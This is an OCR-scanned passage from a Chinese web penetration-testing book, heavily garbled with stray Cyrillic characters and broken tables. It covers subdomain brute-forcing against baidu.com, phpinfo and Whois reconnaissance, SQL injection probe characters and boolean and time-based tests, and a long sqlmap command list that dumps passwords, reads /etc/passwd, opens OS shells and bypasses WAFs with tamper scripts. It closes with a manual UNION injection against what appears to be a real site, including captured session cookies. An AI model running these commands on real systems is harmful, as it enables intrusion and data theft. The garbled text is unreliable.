(2) ІА. 1013938 1.8 103-2077. ш ШИЕ 
Маде By 蓝 色 光芒 Г 完成 后 自动 保存 并 退出 。 
* ЕН: 
3.1 22 Web 信 ЕНЕ Ж : 121,25, 80, 135, 139, 1433 


和 开始 вк ША вея 


1. 二 级 域名 图 3-2 ”端口 扫描 工具 


在 对 一 些 大 型 网 站 进行 渗透 测试 时 ， 主 站 很 难 直接 发 现 漏洞 ， 而 子 站 容易 出 现 问题 。 
例如 SQL 注入 ， 往 往 因 为 数据 库 的 配置 不 严谨 ， 寻 致 黑客 可 以 利用 子 站 的 注入 进行 路 库 ， 
或 者 拿 下 子 站 的 服务 器 ， 利 用 内 网 危害 到 主 站 的 安全 。 图 3-3 便 是 用 一 个 Python 的 脚本 来 
对 白 度 的 二 级 域名 爆破 的 结果 。 


БЯ 管理 员 ; python - subDomainsBrute,py baidu.com -f subnames,txt -o xx.txt 
red.baidu.com 10.26.3.244, 18.91.168.44, 10.36.4.138, 10.42.4.856Щ 


еп јоу. ради. сот 117.185.16.17 

пе .baidu.com 180.149 .132 .155 

mt .baidu.com 18.288.6.11 

умеди. Ба1 Чи. сот 111 .13.12.201, 111.13.108.159 

6 - Баз Чи - сот 119 .?25.218.7?7й, 119.25 .-21?.199 

adv .baidu.com 10.99.57.42 

everything .baidu.con 611.135.162.103 

zhanzhang-baidu.com 189 149 132 23 

hs „Батди .com 220.181 .164.42 

ddm. Базйи. сот 1й.5й.14.165. 10.26.5. 6 

hr .haidqdu com 61.135.185.136. 220.181.57.21? 

atom.baidu.con 10.26.25.78 

btp.baidu.com 19.46 .135 .26 

zhidao .baidu.con 111.13.12.103, 111.13.198.13 

mobile .baidu.con 220.181.163.133. 180.149.131.211 

taiwan .baidu . соп 228 .181.52.216, 228.181.52.21? 

aus.baidu.com 1й.22й.14й.59 

writing.baidu.com 111.13.101.58 

Song „Бати „сот 189 .9?.33.1329 

аке. раду. сот 10.42.137 .45 

ъі11Љљоака. ради. сот 19.46 .7.199 

п>8 - Баз Чи - сот 111 206 .37.164 Ш 
211 found ! 48798 remaining ! 6341 scanned іп 224.32 зссопЯз Б 


图 3-3 ”利用 脚本 爆破 出 211 个 子 域名 


т! 


2. 目录 信息 
在 渗透 中 ， 目 录 是 极为 重要 的 信息 。 如 果 得 到 了 根 目 录 ， 便 可 以 结合 注入 进行 
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GetShell 〈 取 得 权限 ) ， 如 果 有 了 Web 目 录 ， 便 可 以 党 试 对 后 台地 址 进行 爆破 ， 对 后 台 文 
件 进行 猜 解 。 由 此 可 见 目录 的 重要 性 ， 而 获得 目录 的 常见 方法 如 下 所 述 。 
(1) phpinfo 和 探 针 文件 。phpinfo 文 件 如 图 3-4 所 示 。 


3-4 phpinfo 文 件 
PHP 探 针 文件 如 图 3-5 所 示 。 


RSRS NPE М 277 458 РНЕНЫЕ : 173.245.52.98 
Ез sn -ae ап 22 16:19:19 EST 2012 х86 64 


А " | Apache/2.2.23 (Unix) mod_ssl/2.2.23 Ореп 81 /0.9.8е- 
а шы лоны ын Gpe-rhel5 mod Бибтие/1.4 mod fegid/2.3.6 


| zh-cn.zh:q=0.8.en-us;q=0.5,=n;a =0,3 80 
Гасан В . š . . 
webmaste zS “w. № H 


— 4. 


| 2013-03-18 03:43:12 报 务 器 已 到 行 时 间 | 4813579 
| AMD Орїсгоп(їт) Processor 6128 | #Ъ®800,000 | 7:512 КВ | Водотпір5:3999,99 x16 

Ои, D96sy, 0951, 1009614, 0%wa, 0%irq, 0%softirq | 256855 

6228 1321043 С, ВЮ 82.092 С, FA 1238.951 G ， 桂 用 至 6.21% 


> 
物理 内 存 : H 31438 G , 0A 9.251 G , SA 22.187 G , = 29.42% 


Cache 化 内 存 为 7.748 G ,使 用 24,55 96 | Buffers ЗЕЕ 0.571 G 
НЕЧЕН 0.932 G ,真实 内 存 空间 30,506 С Е 26% (| (í aaa 


SWAP 医 ; 共 33.406 б, B&A 0 G, =й 33.406 G , (450% 


0.02 0.05 0.00 1/365 


| вее: 998 М 728K 6728 Bix: 998 М 728K 672 В 
| 已 接收 : 已 发 送 : 
ВЕ: 236 676M 940K 6208 ЕСІ 2961016М 610К1023В 


date libxml openssl рс 115 bcmath calendar ctype curl dom filter ttp gd 
gettext hash ісопу 3233100 јзоп mbstring mysql posix Reflection standard SirglexML 3Р1 зоскетз 
8 ісе imap tokenizer xrl xmlreader xmlwriter cgi-fcgi сАссс1сгаъог icnCube Loader Zend Optimizer 


РНР/БЕ ( phpinfo ) : PHPINFO PHP 版 本 ( php_version ) : 

pHp 运 行 方式 : CGI-FCGI Шан АРИ ( петогу Ней): 

PHP 安 全 模式 (safe_mode] : |x | РОЗТАЕЕБЕВЬНЙИЫ ( post тах size ) : 
上 传 文件 县 大 限制 (upload_max filesize ) : | 20м тела ( precision } : 
ЮЖНЕЕ] ( г-ах -кесиһоп, bme ) : 308 зоске ЗЕТІН 【dcfault_socket Нтео) ; 
ET Г FEREZ (шег dir] ， 


102 C enable 01) Š | ү 指定 包含 文件 目录 (incdlude_path ) : 
V 


Шемен ( register globals] : 


图 3-5 ”PHP 探 针 文件 
(2) 搜索 引擎 。 在 渗透 中 ， 搜 索引 擎 是 一 把 利器 ， 兴 试用 搜索 引擎 的 语法 ， 往 往 会 


STAA (display_errors ) : 


第 3 章 ” Web 渗透 测 试 一 一 透 过 攻击 看 防御 = Mh 


有 意 想 不 到 的 收获 。 
下 面 是 一 些 第 用 的 搜索 引擎 语法 。 


> domain: 用 domain 命 令 可 以 查找 跟 某 一 网 站 的 相关 信息 。 

> filetype: 限制 查找 文件 的 格式 类 型 。 目 前 可 以 查找 的 文件 类 型 有 pdf.doc/Xls ppt/ rtf。 
> шип: 限定 查询 匹配 只 搜索 URL 链接。 

> link: 网 站 外 链接 查询 。 

> site: 网 站 整 站 搜索 引擎 收录 查询 。 

> intitle: 搜索 网 页 标题 中 含有 的 关键 词 。 


(3) 扫 拉 器。 对 渗透 目标 用 第 见 的 目录 进行 暴力 破解 。 此 方法 往往 对 那些 安全 性 较 
低 的 网 站 有 效 。 
(4) 爬虫 。 谎 虫 在 渗透 中 起 寿 很 重要 的 作用 ， 用 来 发现 一 些 隐 蔽 的 目录 。 


3.1.3 Whois 信息 搜集 


Whois 即 域名 查询 协议 ， 是 用 来 查询 域名 的 IP 地 址 以 及 所 有 者 等 信息 的 传输 协议 。 网 
络 上 有 很 多 提供 Whois 查 询 的 平台 ， 如 图 3-6 所 示 ， 将 目标 域名 输入 查询 ， 便 可 以 看 到 目标 
站 点 的 域名 服务 器 、DNS 服 务 器 以 及 其 他 隐私 信息 。 


域名 Whois 查 询 工 县 


А 86: | тарегз. 


тарезпе 常用 域 书后 号 ;whois 吉 疝 ; 
mapers_ cc т 查询 


mapers.net 相关 查询 ; НЕ ЛАВА ВЛЕЕ ІРНӘНЕІЗ РАЗАН Бал Аека а ня ранее 
域名 : mapers.net 111811126455 

НЕЙ 2015-06-06 20:57, а ЗЕЯ 

ЕА: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM 

更 新 时 间 : 20152028019 

上 时 间 : 20152019109 

过 # 朋 j 间 : 20162019109 

КНЕ: whois.PublicDomainRegistry.com 

0458-52: F1G1NS1.DNSPOO.NET 


ОМ$Я 3:58: F1G1NS2.DNSPOO.NE T 


ВЕРИЛ: ВЕТ ЕРЕН А http://www.icann.org/ ори ЕР 


3-6 ”Whois 查询 结果 


3.1.4 ”爆破 信息 搜集 


“爆破 ”是 一 种 形象 的 说 法 ， 即 骏 力 破解 ， 一 般 使 用 穷 举 或 字典 〈 大 量 数据 集合 ) 列 
举 的 方法 。 在 渗透 测试 中 ， 爆 破 的 作用 非常 重要 。 特 别 是 针对 一 些 大 型 企业 的 内 部 系统 ， 
很 多 员工 为 了 使 用 方便 ， 而 忽略 了 密码 的 安全 性 ， 和 弟弟 使 用 一 些 弱 口令 作为 密码 ， 而 用 户 
名 往往 就 是 其 姓名 或 拼写 。 黑 客 可 能 尝试 利用 搜索 引擎 和 社工 库 对 渗透 目标 的 员工 名 单 进行 
搜集 ， 然 后 进行 密码 字典 生成 和 灯 破 。 防 范 这 种 攻击 的 方式 ， 一 是 增加 验证 ， 让 骏 力 破解 无 
法 进行 ， 例 如 验证 码 ; 二 是 提高 密码 安全 性 ， 这 在 附录 中 会 详细 探讨 。 
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32 SQL 注入 


SQL 注入 曾 在 几 年 前 就 流行 于 世 ， 而 如 今 ，SQL 注 入 仍 是 最 流行 的 攻击 手段 之 一 ， 开 
发 者 们 对 其 伤 透 了 有 脑筋。 当然， 主要 是 由 于 注入 攻击 的 灵活 性 ， 一 个 目的 ， 多 个 语句 ， 多 
Е 

SQL 注 入 可 以 分 为 工具 和 和 手工 两 类 ， 工 具 因 为 目 动 化 ， 常 常会 比 手工 高 效 很 多 ， 但 因 
为 其 并 不 是 有 针对 性 地 进行 注入 ， 相 比 手工 注入 就 局 限 了 很 多 。 


3.2.1 注入 的 挖掘 


an НЕН Л, НИНЕ РЕГ ПІНЕТТЕЗОІЗЕ A, m AF ARE, 
会 忽略 一 些 隐藏 链接 、API 调 用 、http 头 中 的 参数 。 那 如 何 进行 全 面 的 SQL 注入 挖掘 呢 ? 
кашы. 
由 图 3-7 可 以 看 到 操作 时 间 Web 站 点 发 送 的 每 个 http 数 据 包 。 数 据 包 中 包含 了 http 头 和 
传递 的 参数 ， 而 注入 常常 就 发 生 在 这 些 参数 中 ， 图 3-8 简 单 分 析 了 http 数 据 包 的 结构 (大 方 
框 为 http 头 ， 小 方 框 为 参数 ) 。 


Ë Burp Suite Professional v1.5.18 - licensed to LarryLau < (o e 


Burp Intruder Repeater Window Help 


Target Г Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 


| intercept ау Options | 


Filter: Hiding CSS, image and general binary content |?) 
Params | Edited | Status | Length | MIME t... | Extension Title 

143 http'//yunfangwl com GET 上 common азр?кі-1 а 200 8359 HTML asp ФОШОАС ЕРЕО š 
104 ”http:Wyunfangwlcom СЕТ Mew.asp 国 Са 20 9118 HTML asp ОЕЕз ри Ее | 
105 http //yunfangwl com СЕТ po вар О О 200 10428 HTML asp ОЕАЕ + ЕРҒО 
106 http.//yunfangwl.com СЕТ /jbasp Ы СІ 200 7637 HTML р ЕРАОБЕ. ЕРГО 
107 ”http-Wyunfangwl сот СЕТ /gbook asp g [j 200 12470 HTML p УЕА ЕРЙ 
125 -http-/fyunfangwl.com СЕТ 5/5. ј5 О Я 200 565 pt js 
131 http'//www. jsxyidc.com GET Jxycms_js/jquery.DB_tabMotion... (1 СІ 200 377 script в 
132 Һир www |вхукіс сот СЕТ jxycms jsijquery B 国 日 script js 

9 Ч scnpt js 


14 http'//www.jsxyidc.com GET /куств |ъ/соттоп.)5 
一 и Б 


图 3-7 ”对 站 点 操作 时 的 数据 包 


зег- а: Mozilla/5. 0 (Windows NT 6.1; ку:39.0) Сеско/20100101 а 0 
Accept: text/html,application/xhtml+xml,application/xml;d=0.9,*/*;cd=0.8 
дссерс-Папачацче: zh-CN, zh; = 8, еп-05;4=0.5,еп;4=0.3 

Accept-Encoding: gzip, defla 

ооКіг: ASPSEISS ен АЕ НИНЕ 

onnection: keep-alive 

ontent-Type: application/x-wwg-form-urlencoded 

ontent-Length: 4 
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大 臻 了解 了 数据 包 结 构 以 后 ， 便 可 以 开始 进行 注入 的 挖 据 了 。 所 谓 挖 据 ， 就 是 判断 茶 
个 参数 是 否 可 以 进行 注入 。 下 面 来 探讨 一 下 常见 的 判断 方法 。 


1. 报错 注入 


一 般 情况 下 ， 大 部 分 编程 语言 为 了 方便 开发 人 员 可 以 灵活 地 调试 和 修复 其 应 用 程序 ， 
会 使 用 一 些 内 置 的 错误 处 理 库 ， 从 而 简化 调试 程序 的 时 间 。 而 报错 注入 就 是 输入 一 些 特殊 
字符 使 语法 产生 错误 ， 从 而 判断 是 否 存 在 注入 ， 常 见 的 特殊 字符 如 下 。 

(1) ' 

(2) \ 

(3); 

(4) %00 

(5) ) 

(6) ( 

(7) # 

(8) " 

在 提交 参数 时 加 上 这 些 特殊 字符 ， 如 果 报 错 ， 那 么 极 有 可 能 是 一 个 注入 点 ， 如 图 3-9 
所 示 。 


ft JET Database Engine WR ' 80040е14' 


字符 叱 的 语法 锚 误 在 查询 表达 式 “idz146'”′ фо 


/ветз 4е1а11. азр, П 10 


图 3-9 单 引 号 报错 实例 
2. АФ 


何 为 盲 注 ? 其 实 盲 注 和 报错 注入 是 相对 的 ， 报 错 注 入 会 返回 一 些 数 据 库 的 具体 信息 ， 
而 盲 注 只 会 返回 true 与 false 两 种 值 ， 从 而 对 想得到 的 信息 进行 猜 解 ， 因 此 相 比 报错 注入 ， 
讶 注 的 效率 较为 低下 。 常 见 的 讶 注 分 为 两 种 ， 布 尔 型 盲 注 和 基于 时 间 的 盲 注 。 这 两 者 的 区 
别 在 于 判断 注入 的 条 件 不 同 。 布 尔 型 盲 注 是 对 页 面 啊 应 的 信息 进行 判断 ， 而 基于 时 间 的 讶 
注 也 就 是 党 说 的 延迟 注入 ， 是 对 页 和 面 啊 应 的 时 间 进 行 判 断 。 

对 于 布尔 型 讶 注 ， 在 网 站 默认 关闭 错误 信息 时 ， 如 果 这 时 并 没有 做 其 他 处 理 ， 可 以 
通过 逻辑 表达 式 来 进行 盲 注 。 大 概 的 原理 是 :如 果 笔 者 的 逻辑 表达 式 是 正确 的 ， 整 个 SQL 
便 询 语句 一 定 会 返回 结果 ， 那 么 网 站 显示 了 正确 的 内 容 。 基 于 这 个 原理 ， 可 以 通过 注入 依 
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次 获取 每 个 字符 。 和 弟 见 的 判断 方法 中 最 经 典 的 便 是 and 1-1; ара 1=2 了 ， 当 提交 and 1=1 时 
页 面 正 常 ，and 1=2 时 页 面 不 正常 ， 则 存在 注入 。 不 过 ， 这 种 判断 方法 是 针对 数字 型 参数 
的 ， 与 其 类 似 的 还 有 or 2221; or 1>2; хог 1=1; хог 1=2 等 。 但 对 于 字符 型 参数 ， 常 用 的 
语句 是 ' and '1'= 1 :;'and'1'=2， 其 判断 方法 和 数字 型 相同 。 

对 于 基于 时 间 的 盲 注 ， 一 般 是 在 条 件 更 为 苛刻 的 情况 下 (例如 最 终 进 行 了 跳 转 ) 使 
用 的 一 种 注入 的 方式 。 以 MySQIL 为 例 ， 对 其 的 判断 方法 主要 涉及 sleep 和 benchmartk 两 个 也 
数 ， 这 里 以 benchmark 函 数 为 例 进行 介绍 。 

BENCHMARK ( count, expr ) 

其 作用 是 重复 count 次 执行 表达 式 expr， 提 交 后 根据 其 响应 时 间 来 判断 表达 式 正 确 
与 否 ， 是 否 存在 注入 。 当 然 ， 延 人 返 注 入 一 般 都 交 给 工具 或 脚本 去 分 析 ， 能 大 大 提高 准确 性 
和 效率 。 


3.2.2 工具 注入 


随 看 注入 攻击 的 流行 ， 市 场 上 工具 的 种 类 也 较为 繁多 。 常 见 的 有 sqlmap、Havjj 等 ， 其 
中 sqlmap 因 为 人 免费、 开源 、 功 能 强大 等 特点 ， 受 到 了 广大 使 用 者 的 推 染 。 本 节 便 来 详细 讲 
解 Windows 系 统 下 sqlmap 的 使 用 。 


1. sqlImap 的 安装 


(1) sqlmap 需 要 在 Python 环 境 下 才能 运行 ， 因 此 在 安 状 sqlmap 之 前 需要 安装 Python。 
在 Windows 下 ， 下 载 并 运行 Python 的 安装 包 ，Python 由 于 2.x 版 本 与 3.x 版 本 性 能 上 有 一 定 差 
异 ， 所 以 我 们 使 用 2.7.2 版 本 (Python 的 版 本 问题 是 个 很 有 趣 的 话题 ， 各 位 如 果 感 兴趣 可 以 
目 己 查 找 资料 进行 了 解 )， 如 图 3-10 所 示 。 

(2) 安 闭 完成 后 ， 需 要 添加 环境 变量 。 安 闭路 径 是 D: \python， 执 行 “我 的 电 
脑 ” 一 “属性 ”命令 ， 打 开 “ 高 级 ”选项 卡 ， 如 图 3-11 所 示 。 


要 进行 大 多 数 更 次 ， 您 必须 作为 管理 员 登 录 。 
性 能 


视觉 效果 ， 处 理 器 计划 ， 内 存 使 用 ， 以 及 虚拟 内 让 


Select whether to install Python 2.7.2 
for all users of this computer- 


用 户 配置 文件 
与 您 登录 有 关 的 点 面 仅 置 


© Instal for ай users 


О Instal just for me (not avatable оп Windows Vista) 
[Ж а). 


启动 和 故障 恢复 
казва, Ката a 


ЖФ)... 
[йй т)... ) 


вао | 
图 3-10 ”Windows 环 境 下 安装 Python 图 3-11 配置 运行 环境 


| Back JENet> ] [Омош | 


Гад 0 
9. / 
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(3) 单 击 “环境 变量 ”按钮 ， 在 path 中 添加 D: \python (25% 45) 并 保存 ， 如 图 


3-12 上 所 示 。 


(4) Python 安装 配置 完毕 后 ， 下 载 sqlmap 的 压缩 包 并 解压 ， 解 压 路 径 是 D: \руфоп\ 
sqlmap\。 打 开 命 令 提示 从 ， 用 cd 命令 切换 到 sqlmap 解 压 路 任 ， 试 看 运行 一 下 sqlmap.py， 检 


但 其 是 否 安装 成 功 ， 如 图 3-13 所 示 。 


— = YY 


хане EJ 
计算 机 名 | 硬件 系统 保护 | 远程 
环境 变量 


高 级 


Administrator HAPSE (U) 
ЖШ 值 


编辑 系统 变量 


变量 名 (и): ath 


ТЕЙ (V): .100\Тоо1 5 УВз па 5$ е11 АС овтоп7 МЕЧ 


ШЕ 取消 


Path C:\Windows\system32:C. Windows: 
PATHEXT СОМ;. ЕХЕ:. ВАТ; . CMD: .VBS;.VBE; 
РЕОСЕЗЯПК АК “ав 


жй)... | RED... | Өй 


确定 | 取消 | 


图 3-12 ”设置 环境 变量 


2. sqlmap 的 使 用 


ШЖ 管理 员 : python -sqlmap.py = | |= 
Microsoft Windous ПЖ. 6.1.2601 1 
ПЗ 所 有 «с» 2009 Microsoft Corporation. 保留 所 有 权 El = 


(еш. о 


D: хруслоп ?сй зу! пар 


D: Хрублоп са тар с 4 1пар. py 
Usage; р: хрубнопзаТпарчва пар. рчу [options] 


саТпар-ру: error: missing а mandatory option <-а, -и, -1, -п, -ғ, -9. -с, --ъ ха 
purge-output ок dependencies), use -h for basic or -hh for adv 


Press Enter to сопбіпис... 


图 3-13 ”检查 是 否 安装 成 功 


sqlmap 是 一 球 半 目 动 化 工具 ， 需 要 手动 输入 命令 进行 注入 。 第 见 的 命令 如 下 这 里 假 


设 日 标 URL 为 http://url/news?id=1) 。 


sqlmap.py -u "http://url/news?id=1" --current-user # 获 取 当 前 用 户 名 称 
sqlmap.py -u "http://url/news?id=1" --current-db # 获 取 当 前 数据 库 名 称 
sqlmap.py -u "http://url/news?id=1" --tables -D "db пате" # 人 列表 名 


sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" 
users-D "db name" -v 0 # 列 字段 

ваіпар.ру ú "http //ог1/пеиз?19-1" dumpi -С "column пате" -T 
"table name" -D "ар папе" # 获 取 字 段 内 容 


sqlmap.py -u "http://url/news?1d=1" --smart --level 3 --users 


#smart В level 执行 测试 等 级 


sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --users 


#dbms 指 定数 据 库 类 型 
sqlmap.py -u "http://url/news?id=1" --изег5 # 列 数据 库 用 户 
sqlmap.py -u "http://url/news?id=1" --ар5 # 列 数据 库 
sqlmap.py -u "http://url/news?1d=1" --passwords # 数 据 库 用 户 密 码 


sqlmap.py -u "http://url/news?id=1" --раѕѕмогаѕ-0 root -v 0 
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# 列 出 指定 用 户 数据 库 密码 
sqlmap.py -u "http://url/news?id=1" --dump -C "раѕѕмога, иѕег, іа" 
-Т "са епаше" -р "ар паше" 

--start 1 --stop 20 # 列 出 指定 字段 , 列 出 20 条 
sqlmap.py -u "http://url/news?id=1" --ашпр-а11 -v 0 
# 列 出 所 有 数据 库 和 表 


sqlmap.py -u "http://url/news?id=1" --рг1у11едез # 碍 看 权限 
sqlmap.py -и "http://url/news?id=1" --рг1у11едез -U "WEB USR" 


# 查 看 指定 用 户 权限 
sqlmap.py -u "http://url/news?id=1" --15-дра -v 1 ЕБЕТ 
sqlmap.py -u "http://url/news?id=1" --го1ез # 枚 举 数 据 库 用 户 角色 


sqlmap.py -u "http://url/news?id=1" --udf-inject 

# 导 入 用 户 自 定义 函数 ( 获取 系统 权限 ! ) 
sqlmap.py -u "http://url/news?id=1" --апмр-а11 --exclude-sysdbs 
-v 0 # 列 出 当前 库 所 有 表 
sqlmap.py -u "http://url/news?id=1" --union-cols #union 查询 表 记 录 
sqlmap.py -u "http://url/news?id=1" --соокіе "cookie" #cookie 注 入 


sqlmap.py -u "http://url/news?id=1" -р # 获 取 banner 信 息 

sqlmap.py -u "http://url/news?id=1" --data "SearchValue= 请 输入 关键 

“Ғезійа-1" роз A 

sqlmap.py -u "http://url/news?id=1" -v 1 -f # 指 纹 判别 数据 库 类 型 

sqlmap.py -u "http://url/news?id=1" --ргоху"Һһіір://127.0.0.1:8118" 
# 代 理 注 入 

sqlmap.py ü "http://uri/news?1d=1" —string"STRING ОМ ТВОЕ РАСЕ" 
# 指 定 关键 词 


sqlmap.py -u "http://url/news?id=1" --з41-з1е11 #8478я за1 #3 
sqlmap.py -u "http://url/news?1id=1" --Н1е /etc/passwd 
sqlmap.py -u "http://url/news?id=1" --os-cmd=whoami # 执 行 系统 命令 
sqlmap.py -u "http://url/news?1id=1" --о5-5һе11 ЖАН 5һе11 
sqlmap.py -u "http://url/news?id=1" --05-рип #Койзпет1 
sqlmap.py -u "http://url/news?id=1" --гед-геаа + ЖЗ 
sqlmap.py -u "http://url/news?id=1" --арѕ-о "sqlmap.py.log" 

# 保 存 进度 
sqlmap.py -u "http://url/news?id=1" --арѕ -o "sqlmap.py.log" --гезише 

# 恢 复 已 保存 进度 
sqlmap.py -g "google 语 法 " --dump-all --batch 

#google 搜 索 注 入 点 自动 跑 出 所 有 字段 
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3. 对 WAF 的 绕 过 


在 实际 注入 测试 中 ， 遇 到 WAF (Web Application Firewall， 网 站 应 用 级 入 侵 防 御 系 
统 ) 是 党 有 的 事 ， 我 们 可 以 绕 过 WAF 继 续 进 行 注 入 检测 ， 本 节 讨 论 sqlmap 对 WAF 的 绕 过 。 
在 sqlmap 中 ， 用 -tamper 命 令 可 以 调用 内 置 的 绕 过 脚本 ， 具 体 语 法 格式 如 sqlmap.py -u 
"url" -v 1 --dbs -tamper "脚本 名 "。 表 3-1 是 常用 的 脚本 名 及 作用 。 
表 3-1 sqlmap 常 用 脚本 名 及 其 作用 


8 代替 引号 
ET < = 
绕 过 过 滤 '=' 替换 空格 字符 〈") 
十 过滤 ' > '， 用 GREATEST 替 换 大 于 号 
格 奉 换 为 # 号 、 随 机 字符 串 以 及 换行 符 
绕 过 过 滤 双 引号 ， 蔡 换 字 符 和 双 引 号 
每 个 关键 字 之 前 添加 MySQL 版 本 评论 
格 蔡 换 为 # 号 以 及 更 多 随机 字符 串 和 换行 符 
有 效 负 荷 结束 位 置 加 载 零 字 节 字符 编码 


2 


Базеб4 ЯН 1 


| 
= 

= 

9 


|= [Е 
Er | E | E 
ст 

г 

3 

П 


x 


Pt | № 


x 


га 


НУ 
Це 
ща 
Ж 
ФЕ 
5 
= 
R 

28 
dl 


i= 
ват 
Hh 


格 ， 包 含 完 整 的 查询 版 本 注释 

空格 替换 其 他 空白 符号 (mysq]) 

用 between 蔡 换 大 于 号 〈>) 

替换 空格 字符 СО C-') 后 跟 一 个 破 折 号 注释 一 个 新 行 ('n') 

围绕 SQL 关 键 字 添加 多 个 空格 

用 + 替换 空格 

代替 空格 字符 后 与 一 个 有 效 的 随机 空白 字符 的 SQL 语句 ， 然后 替换 = 为 like 
双重 查询 语句 。 取 代 predefined SQL 关键 字 with 表 示 suitable юг (Я 


Ур 


如 тер!асе("ЗЕГЕСТ", "")filters 

代替 空格 字符 《"") 从 一 个 随机 的 空白 字符 可 选 字 符 的 有 效 集 
奶 加 sp password, JADBMS H ЖУН ЭЖЖ Ab EE В ЖЕ АКЕ 
双 URIL 编 码 〈 不 处 理 已 编码 的 ) 

替换 UNION ALL SELECT UNION SELECT 


随机 大 小 写 
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续 表 


追加 特制 的 字符 串 
关键 字 前 加 注释 


3.2.3 手工 注入 


在 渗透 测试 中 ， 再 强大 的 注入 工具 也 会 有 局 限 性 ， 而 手工 注入 恰恰 能 解决 这 一 弱点 。 
当然 ， 手 工 注 入 需要 渗透 者 对 其 针对 的 数据 库 语 法 有 一 定 了 解 。 不 过 ， 因 为 SQL 注入 的 灵 
活性 与 多 样 性 ， 如 果 详 细 深 入 地 讲 ， 悉 人 能 单独 与 成 一 本 书 。 在 这 里 ， 笔 者 就 选取 最 具 代 
表 性 的 例子 给 大 家 示范 。 

(1) 对 渗透 目标 进行 注入 的 挖 据 ， 这 里 对 挖 据 的 过 程 就 不 表 奖 述 了 。 确 定 了 注入 
点 ， 便 可 以 开始 进行 注入 测试 了 ， 如 图 3-14 所 示 。 


ontent-Length: 13 
ookie: Database error 
| 1Ус 9723485е19#163еВе518саб94е959ср9= 1435891291; 
| lpvt 9723485е19716З3еВе518саб94е959с59- 1435891445; 
iheima=73ka52rq55tl2t8tn86h2lvrs0; | 501: SELECT aws оріс .* FROM aws topic WHERE ( 
гг зезз10п-90ге4п6 1 94чачд9споуо0па1п41; topic title = ''') ORDER ВУ topic 14 А5С 


rz__user_login=2-31I18rj1NPLwNSj4crO1l1fLMyoywoNbHlerv2NPR 
NeOm6Sul5yYw7DZzMTRnuDJyc blZ-dxduvysfQnN Fnc-WrpPbySvUW Error Message: Mysqli prepare error: You have an error 
oyfnLKbmoywoLunwNS3j3ttDnz-bPxpcaq; in your SQL syntax; check the manual that corresponds 
NZZDATA1000524616=1204303738-1435886381-http%253A%s252F% to your MySQL server version for the right syntax to 
S2SFwww.iheima.comy252F%w7C1435886381 use near '''') ORDER BY `topic ій А$С' at line 1 
onnection: keep-alive 
exception 'Zend Db Statement Mysqli Ехсерііол' with 
ache-Control: no-cache message 'Mysqli prepare error: You have an error іп 
your SQL syntax; check the manual that corresponds to 
opic_title=' your MySQL server version for the right syntax to use 
near '''') ORDER BY Форіс ій ASC' at line 1' in 
/data/www/ask.iheima.com/system/Zend/Db /Statement /Mysql 
і.рһр:77 
Stack trace: 
#0 


图 3-14 ”MySQL 查询 语句 示例 
ЕЕ: 这 里 用 到 了 Burp 的 repeater 功 能 。 
由 图 3-14 可 以 看 到 POST 下 的 参数 topic_title 存 在 报错 注入 ， 这 里 提交 了 单 引 号 ， 返 回 
了 错误 信息 。 
错误 信息 中 返回 了 出 错 的 查询 语句 如 下 : 


SELECT 'амз topic'.* FROM 'aws topic' WHERE ( topic title = ''') ORDER 


ВУ "Горас 19" А5С 


(2) 这 是 一 条 MySQL 碍 询 语句 。 再 来 看 看 提交 的 数据 位 于 语句 的 什么 位 置 ， 提 交 
xx'， 可 以 看 到 得 询 语句 如 下 : 

SELECT ‘aws іоріс".% FROM 'амз Форіс" WHERE ( Форс Ее = "'хх'') 

ORDER ВУ "Торас за" АЗС 
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(3) 确定 了 提交 的 数据 所 处 位 置 ， 便 可 以 用 闭合 语句 试 试 。 假 设 这 里 提交 的 是 xx'") 
#， 于 是 查询 语句 就 变 成 了 : 

SELECT "анз topic'.* FROM 'амз topic' WHERE ( topic title = 'хх') +") 

ORDER BY "сорте за" ASC 

而 # 企 MySQL 中 是 注释 待 ， 所 以 实际 上 香 询 语句 变 成 了 : 

SELECT 'амз topic'.* FROM 'амз topic' WHERE ( topic title ='хх') 


(4) 成 功 财 合 。 因 此 构造 的 语句 格式 应 该 是 : 
') ”注入 语句 + 


(5) 知道 注入 语句 的 格式 了 ， 再 来 看 看 查询 语句 本 身 ， 因 为 是 在 WHERE 后 面 ， 所 以 
只 能 用 联合 查询 或 者 盲 注 进行 注入 。 先 用 ORDER ВУ 进行 猜 解 ， 可 以 看 到 ORDER BY 16 
时 正常 返回 ， 而 ORDER BY 17 时 报错 。 因 此 可 以 构造 : 

RR ГЕО т Е 


ШІЕІЗ-150 25, ЖІК, Aea AAE КЕКТІ ЖН) 


("згабиз": "1", "гез": [{"Еоріс id":"1521","topic title":" 
“ "add time" : "1421635405" ,"discuss count":"1",'"topic де 
sceription":"" "topic pic":"","topic Тоск":0,"Тосиз coun 
.141","Еоріс title":"2" add ёіте" : "3" ,"discuss count": 
"4" ,"topic description":"5","topic pic":"6","topic lock 
"sort" :"16"}],"info" :"\u6210\u529f"} 


Hm lvt 9723485e19f163e8e518ca694e959cb9=1435891291; 

Hm lpvt_9723485e19f163e8e518ca694e959cb9=1435891445; 
iheima=73ka52rq55t12t8tn86h21lvrsD0O; 

rz Session=90te4m6lgqdqadq4cmovoDnglh41; 

гг user_login=2-3I18rj1NPLwNSj4crO1fLMyoyvoNbHlerv2NPR 
xNeOm6SulSyYw7DZzMTRnuDJyc_b1l1Z-dxduvysfQnN_Fnc-WrpPbySvW 
xoyfnLKEbmoyvwvoLunwNSjittDnz-bPxpcaq; 
NZZDATA1000524616=1204303738-1435886381-httpyx253Ay252F%w 
52Fwww.iheima.comy252F%7C1435886381 


Pragma: no-cache 
ache-Control: no-cache 


opic_title=') UNION SELECT 
1,2,3,4,5,6,7,В,8,10,11,12,13,14,15,1Е В 


图 3-15 ”联合 查询 
(6) 用 user0、database0 等 函数 代 进 去 查询 试 试 。 
r] UNION ЗЕБЕСТ пизег (Е, 23240061739. 10 11.12713 ПЯ 15 теу 
提交 后 ， 结 果 如 图 3-16 所 示 。 


Pragma: no-cache 
Content-Length: 583 


(—("status":"1","res":[("topic id":"1521","topic title":" 
","add time" : "1421635405" ,"discuss count":"1","topic de 
scription":"", "topic pic":"", "topic lock":0,"focus coun 
из пазка . .61.105","Торас 11 Ле":"2", "айа те": "3", " 
discuss сопи!": "4", "Торас дезсгар:тол": "5" ,"Торас pic": 
